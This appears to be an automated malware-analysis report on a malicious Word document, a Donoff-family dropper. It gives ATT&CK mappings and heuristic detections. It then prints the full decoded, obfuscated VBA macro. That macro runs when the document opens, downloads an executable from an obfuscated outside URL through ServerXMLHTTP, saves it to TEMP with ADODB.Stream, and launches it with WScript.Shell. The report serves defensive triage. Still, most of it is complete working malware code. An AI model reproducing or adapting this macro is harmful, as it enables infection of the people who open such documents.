MALICIOUS (risk score 350)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols
The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for malicious documents. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the macro attempts to execute commands or download additional content. The obfuscated nature of the VBA code and the presence of a benign-looking URL that is likely a placeholder or misdirection point towards a downloader or dropper functionality.
Heuristics (11)

- ClamAV: Doc.Dropper.Donoff-5743530-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched lines in script:
  ```vba
  Dim GkJzXt As String, qqQWMQOv As Integer
  Set KAhKKpGlzU = CreateObject("WScript.Shell")
  End Function
  ```
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script:
  ```vba
  Public Function JXBzmLfW() As Object
  Set JXBzmLfW = CreateObject("ADODB.Stream")
  End Function
  ```
- CallByName call (high, OLE_VBA_CALLBYNAME). Matched lines in script:
  ```vba
  Dim AyqGqXefQ As String
  igJOtE = CallByName(njYPWrJSMM, ldaWc, 2)
  End Function
  ```
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched lines in script:
  ```vba
  End Function
  Private Sub Document_Open()
  Dim mttSwvbe As Integer
  ```
- Reference to Windows Script Host (high, SC_STR_WSCRIPT)
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x40 bytes
Disassembly: attempted x86 opcode disassembly of the 0x40 run.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9063 bytes |

SHA-256: 491da5bc70e68e2bcfc429751d331e78be923dfee5123b6ac4caff3c1d8f1f8b

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 173 of 246 identifiers look randomly generated (e.g. 'SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr'), consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function JqSvkGCPGA() As Integer
hFrQPtBp
iOEGGBQELK
JqSvkGCPGA = 4779
End Function
Private Sub Document_Open()
Dim mttSwvbe As Integer
wyGWpY.pbSZCXhmSD
End Sub
Private Sub HgMddfJ(ByVal wnaYy As Integer)
kKhjcbO
If kbFfJcWPDT("fJB17jk5p", 6938) Then
Vvqbl
fCDqvdI
tMRaXX 5233, "RlRkIP7MU19", 762
End If
End Sub
Private Sub tboKsvkN(ByVal QFlarOMYH As Integer, ByVal HPkFLb As Integer)
WbFWObBP
End Sub
Private Sub WYPBWcKU(ByVal rPhzMg As String, ByVal wcQpWQl As Boolean)
hpyzkXXV "8XydRQkTGiMrmox", False, 6811
NhNNP 1698, 8412
If iqsSlw Then
HXncUHot "B0xDIQATZFOts"
KvgAFCY
HSewNUUfX "B7djm91Oy"
Else
eBXHSXxSTm
End If
XPKypJaPJ 6078, True, 3113
End Sub
Attribute VB_Name = "Ithby"
Private Function GbkVYXuh() As Boolean
puBqPC False, "kaC5cYrlDrvDp"
GbkVYXuh = True
End Function
Private Sub DYnUp(ByVal UrZpgn As String, ByVal PNDGAns As Integer)
oRQsMB
End Sub
Public Function WMJcdb(ByVal vBbzbEV As String, ByVal aJqFS As String) As String
Dim qqqGmed As Boolean, JgXpwpW As String
For zNoozTBlcV = 1 To Len(vBbzbEV)
qqqGmed = yohIEvNDuU.jpjwnKChj(yohIEvNDuU.jdqox(vBbzbEV, zNoozTBlcV), aJqFS, 638)
MWgdETofR = 5559
If Not qqqGmed Then
WMJcdb = WMJcdb & yohIEvNDuU.jdqox(vBbzbEV, zNoozTBlcV)
LICDvxAOy = 7085
End If
Next
End Function
Private Function TepKJZzNjv() As Boolean
RiNRh 3745
TepKJZzNjv = True
End Function
Private Function PgqZWnW(ByVal ibMyK As Integer, ByVal xpnMVUt As Integer) As String
wzDcvaHzAL "kI526hU65u"
lLNzEN 414
yvqqniWt 6874, False, True
PgqZWnW = "3olpYJqw9J3n"
End Function
Attribute VB_Name = "SdkIZOeRT"
Public Function igJOtE(ByVal njYPWrJSMM As Object, ByVal ldaWc As String) As Variant
Dim AyqGqXefQ As String
igJOtE = CallByName(njYPWrJSMM, ldaWc, 2)
End Function
Public Sub pOJmNb(ByVal yClPgtlq As Variant, ByVal PSoJbKoEba As Variant, ByVal bxDAQNTzFR As String, ByVal oSHsWLUbG As Object)
CallByName oSHsWLUbG, bxDAQNTzFR, 1, yClPgtlq, PSoJbKoEba
End Sub
Public Sub ISoSx(ByVal kHdGTYNKtC As String, ByVal eqBYT As Integer, ByVal nHPJawCsAX As Object, ByVal WApkqBkVA As Variant, ByVal XQkBMm As String)
Dim wekeFAKS As Boolean, YoAekV As String
CallByName nHPJawCsAX, kHdGTYNKtC, 1, WApkqBkVA
End Sub
Public Sub nyVis(ByVal CosRCSg As String, ByVal LOMaAFXq As Object)
Dim OLqsgyKydz As Integer, klFXu As Integer
CallByName LOMaAFXq, CosRCSg, 1
End Sub
Public Sub nBEdpfoE(ByVal KwfoJtk As Variant, ByVal WFHGLp As Variant, ByVal wlFegzlvgk As Boolean, ByVal nczauBS As Variant, ByVal yCUkSvZ As String, ByVal SPWDW As Object)
Dim KYLDLixc As Boolean
OWoNkkz = "AQJOV7YRmX5yV"
CallByName SPWDW, yCUkSvZ, 1, WFHGLp, nczauBS, KwfoJtk
End Sub
Public Function kwcXIuGy(ByVal aWlnczuLx As String, ByVal iROcCO As Boolean, ByVal TjNlOT As Integer, ByVal SPWDW As Object, ByVal IuNfhZ As String) As Variant
Set kwcXIuGy = CallByName(SPWDW, aWlnczuLx, 2, IuNfhZ)
End Function
Public Sub LrnQauZ(ByVal hlUbE As Integer, ByVal LwsvZ As String, ByVal ycGOStjrZ As Integer, ByVal vHzOKu As Variant, ByVal DHNjqjc As Object)
Dim kWSBuH As Integer, oViydMyrTP As Integer
xAnXsgtN = False
CallByName DHNjqjc, LwsvZ, 4, vHzOKu
End Sub
Attribute VB_Name = "tvRhy"
Public Function JXBzmLfW() As Object
Set JXBzmLfW = CreateObject("ADODB.Stream")
End Function
Public Function UXVspUID() As Object
Dim pOOVI As Integer
Set UXVspUID = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Public Function KAhKKpGlzU() As Object
Dim GkJzXt As String, qqQWMQOv As Integer
Set KAhKKpGlzU = CreateObject("WScript.Shell")
End Function
Attribute VB_Name = "wyGWpY"
Private Function QXrMrsQ() As String
QXrMrsQ = Ithby.WMJcdb("wRe3wspwowrnsr3erBow3dyw", "rw3")
End Function
Private Function scjAPmCwO() As String
Dim lGbQqfR As Integer
Dim IhUBVCEbAW As Boolean
scjAPmCwO = bYQQFY(FREjEkH, towxipv, towxipv) & SKxccKIV
End Function
Private Sub hvlgmlO(ByVal wyWIWLuRIj As String, ByVal WUBDjJ As Boolean, ByVal PuKhJZxo As Integer, ByVal BusaGxT As Variant)
Dim IHZRneyP As Boolean, CwzbrzK As Integer
Set QhWGb = tvRhy.JXBzmLfW
SdkIZOeRT.LrnQauZ 708, Ithby.WMJcdb("Taayqpae", "7qa."), 3110, 1, QhWGb
SdkIZOeRT.nyVis Ithby.WMJcdb("OXpresns", "r.Xtsu"), QhWGb
SdkIZOeRT.ISoSx Ithby.WMJcdb("EWrQi3EteE", "3QEN"), 6128, QhWGb, BusaGxT, fvzkjXLk
SdkIZOeRT.pOJmNb wyWIWLuRIj, 2, xAOKQ, QhWGb
SdkIZOeRT.nyVis VajxKpN, QhWGb
End Sub
Private Sub xdPBYHjHn()
Dim yDPim As Boolean, OBfNwD As String
On Error GoTo lcLlmF
CrqRpOlM 2612, scjAPmCwO, SilHR
NHFOEgVeoo scjAPmCwO
RPCxFN = "z33eikgFE"
Exit Sub
vkLGZ = 5682
lcLlmF:
End Sub
Private Function fvzkjXLk() As String
fvzkjXLk = "Hm9PzpqXM8Tk"
End Function
Private Sub NHFOEgVeoo(ByVal miSGHSYuNw As String)
SdkIZOeRT.ISoSx zyGqC, 6128, tvRhy.KAhKKpGlzU, miSGHSYuNw, XNPJQFXYf
End Sub
Private Function XNPJQFXYf() As String
XNPJQFXYf = "Jq6p51kMY"
End Function
Private Function bYQQFY(ByVal GSaGv As String, ByVal UTbiy As String, ByVal ypnxtROJG As String) As String
Dim FFDtdQ As String
JixRwEJkN = False
Set ectSqGDH = SdkIZOeRT.kwcXIuGy(Ithby.WMJcdb("EW7nvFWiHro6Hnm7FeHnFt", "6H47WF"), False, 7872, tvRhy.KAhKKpGlzU, Ithby.WMJcdb("wPR6Od6CdESwiS", "xdtw6i"))
bYQQFY = ectSqGDH(GSaGv)
End Function
Private Function SilHR() As String
Dim MpmvU As Boolean
Dim exxvbLptH As Boolean
SilHR = gOwGIDiAO
End Function
Private Function haUcDjaieH() As String
NXgcHedZ = "lJXprLrLKbix"
haUcDjaieH = Ithby.WMJcdb("S2Ce2nd2", "2Co")
End Function
Private Function gOwGIDiAO() As String
gOwGIDiAO = Ithby.WMJcdb("hPCtEtEp:b/IP/oblPCcCabyEfobtEoEPgErIabf.IcEoYmC/bsbybCsEtIeCm/CPcaEPcbhYe/bwCYoCrEdP.eYExeC", "IPCEbY")
End Function
Private Function SKxccKIV() As String
Dim bZoLtgFpw As String
SKxccKIV = JupTi
End Function
Private Function VajxKpN() As String
VajxKpN = Ithby.WMJcdb("Ciliopiske", "tkpi")
End Function
Private Sub Kqnuz(ByVal dlxdZiiDh As Integer, ByVal olcBEYEmB As Boolean)
nlzlivrN 5254, False, False
bHCdDp True, 2221
dKGQB 8006, True, 7782
If fCAhhnf(9180) Then
XWIMFEtxub False
IXexmLYhXX
VDDMzyez 9562
Else
gcJTlZZrR 2876, False
End If
ihWWxOEu 7730, True, "tf0zmSAodfN"
End Sub
Private Function zyGqC() As String
JywcHztmR = "d4OR3A9CGIEikH"
zyGqC = Ithby.WMJcdb("rEWxteWc", "1rWt")
End Function
Private Function YnBzQ() As String
If pjTUCKd(5843, "woONT25Thy") Then
zeMphePZDz 1173, "I2g1yWKwm"
zUtoVINdP 2806, "la8LZGheRu", 559
jvyLJjMjyn
End If
YnBzQ = "DBI3Lm69ouaxgNX"
End Function
Private Function XvQcr() As String
XvQcr = Ithby.WMJcdb("VMQoVziGlQlQQav/5Vv.Q0 QQ(QcVoQmpvaVtQviGbGlVeV; GMGGSIvvEV 9V.vG0;VV WViQGnvdoQwQVsv NQVTG 7Q.QG1V;Q TvvriQdVevnvGt/GQ5G.G0)v", "vVQG")
End Function
Private Function jEAYTHsh() As String
jEAYTHsh = Ithby.WMJcdb("OXpresns", "r.Xtsu")
End Function
Private Sub CrqRpOlM(ByVal tAAsHrFZ As Integer, ByVal eFaIBUyeVu As String, ByVal RYojJhb As String)
Dim FWmFFOn As Integer, QmSSGLrIL As Integer
Set SwsQIpxEC = tvRhy.UXVspUID
vAhuigCxLB = "6Z6ITHFTp"
SdkIZOeRT.nBEdpfoE False, Ithby.WMJcdb("6GE Ta", " a96S"), False, RYojJhb, jEAYTHsh, SwsQIpxEC
SdkIZOeRT.pOJmNb Ithby.WMJcdb("U.sNeTNrN-ANgNTenNt.", "mT.N"), XvQcr, Ithby.WMJcdb("SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr", "QPD3K"), SwsQIpxEC
SdkIZOeRT.nyVis haUcDjaieH, SwsQIpxEC
hvlgmlO eFaIBUyeVu, True, 3347, SdkIZOeRT.igJOtE(SwsQIpxEC, QXrMrsQ)
End Sub
Private Function JupTi() As String
JupTi = Ithby.WMJcdb("P/cF3w8B7P6FBdF00pdF7hh3dB.FeFxFPe", "wBhPFp")
End Function
Public Sub pbSZCXhmSD()
Dim BCcHV As Integer
xdPBYHjHn
End Sub
Private Function OsKGshuod() As Integer
WmkFh
cIsPekWV 9366
OsKGshuod = 9266
End Function
Private Function towxipv() As String
towxipv = "DISj4y0ywL7NH7g"
End Function
Private Function xAOKQ() As String
xAOKQ = Ithby.WMJcdb("6Sakbve66T6oFbkibl6e", "6kb")
End Function
Private Function FREjEkH() As String
FREjEkH = Ithby.WMJcdb("ZTEZIMPZ", "ZoWIO")
End Function
Attribute VB_Name = "yohIEvNDuU"
Private Sub pUdTu(ByVal aqxVWbfR As String)
XHvfGalf
BZbDy False, True, 5361
End Sub
Private Sub nUSoQrDd()
UKUhJchCfN False
UOlvZCoKSe "kzpKzUEINlR4N", 3119
BWDat "xpqAZayG7hMN"
End Sub
Private Function ddtCtq(ByVal FCWjcNQVF As String, ByVal vuVaS As String) As Boolean
UiaKS 8628
jalCYyVT
wbAhL 7029
ddtCtq = True
End Function
Private Sub VlzvwFRdHT(ByVal LCDzSSLr As Boolean, ByVal jCFsafeZa As String)
mokZnpH
HulbI "OGUUM2KcfmcPa"
End Sub
Public Function jpjwnKChj(ByVal sXfnOZpB As String, ByVal XApeM As String, ByVal WGDoQDr As Integer) As Boolean
Dim LuJmzfrRdU As Boolean
jpjwnKChj = InStr(1, XApeM, sXfnOZpB)
End Function
Public Function jdqox(ByVal RKlkWqrIQ As String, ByVal YXFBGbGx As Integer) As String
Dim auYmv As Boolean
Dim tAzuDfeyPm As Boolean
jdqox = Mid(RKlkWqrIQ, YXFBGbGx, 1)
End Function
```